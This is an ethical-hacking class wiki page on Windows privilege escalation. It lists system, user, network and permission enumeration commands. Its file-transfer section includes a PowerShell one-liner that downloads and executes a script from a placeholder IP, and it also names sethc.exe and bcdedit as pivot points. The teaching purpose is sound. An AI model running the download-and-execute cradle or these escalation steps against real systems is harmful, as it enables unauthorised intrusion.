0.00 Class 7 Windows Privilege Escalation - cloudsecuritylabs/ethicalhackingclass GitHub Wiki

Class 7 - Windows privilege escalation

START HERE:

https://github.com/cloudsecuritylabs/ethicalhackingclass/wiki/Privilege-Escalation

Windows System Enumeration

System Information

systeminfo 
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

Windows Architecture

wmic
wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE%

Listing the Disk Drives

wmic logicaldisk get caption || fsutil fsinfo drives

Installed Patches

wmic qfe get Caption,Description,HotFixID,InstalledOn

WHOAMI

whoami

List Users and Groups

net user
net user admin [target admin users]
net localgroup
net localgroup IIS_IUSRS
net group /domain [if connected to a domain controller]
net group /domain "Domain Admins"

Networking Information

ipconfig /all
route print
netstat ‐ano
netsh firewall show state
net share

Showing Weak Permissions

icacls Shared
    (F) : Full access
    (M) : Modify access
    (W) : Write‐only access

Access on folders

Download - https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk

accesschk.exe /accepteula ‐uwqs Users c:\*.*

Listing Installed Programs

Get‐ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime

Listing Tasks and Processes

tasklist /v /fi "username eq system"
Get‐ScheduledTask | where {$_.TaskPath ‐notlike "\Microsoft*"} | ft TaskName,TaskPath,State

File Transfers

Exploit SAMBA - copy \[SMB IP Address][SMB Folder Name][File To Transfer]
Exploit FTP - >ftp open [FTP Server IP Address]
Use powershell - >powershell "IEX(New-Object Net.WebClient).downloadString('http://[IP Address]/[file name]')"

Windows System Exploitation

get access to an admin shell
In Windows you can get a SYSTEM account

User Accounts

for users, admins

Service Accounts / System Accounts

High privilege accounts usually created by OS

Groups

collection of user accounts

Resources

files, folders, service

ACL

who has access to what

sethc.exe

https://www.processlibrary.com/en/directory/files/sethc/28697/

sethc.exe is a process associated with Windows NT High Contrast Invocation and is part of Windows OS. With default Windows settings, this process is run when the shift is pressed 5 times in sequence, to invoke the StickyKeys configuration window.

bcdedit

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/bcdedit BCDEdit is the primary tool for editing the boot configuration of Windows Vista and later versions of Windows. It is included with the Windows Vista distribution in the %WINDIR%\System32 folder. Administrative privileges are required to use BCDEdit to modify BCD.

OSK.EXE

https://support.microsoft.com/en-us/windows/use-the-on-screen-keyboard-osk-to-type-ecbb5e08-5b4e-d8c8-f794-81dbf896267a
Use the On-Screen Keyboard (OSK) to type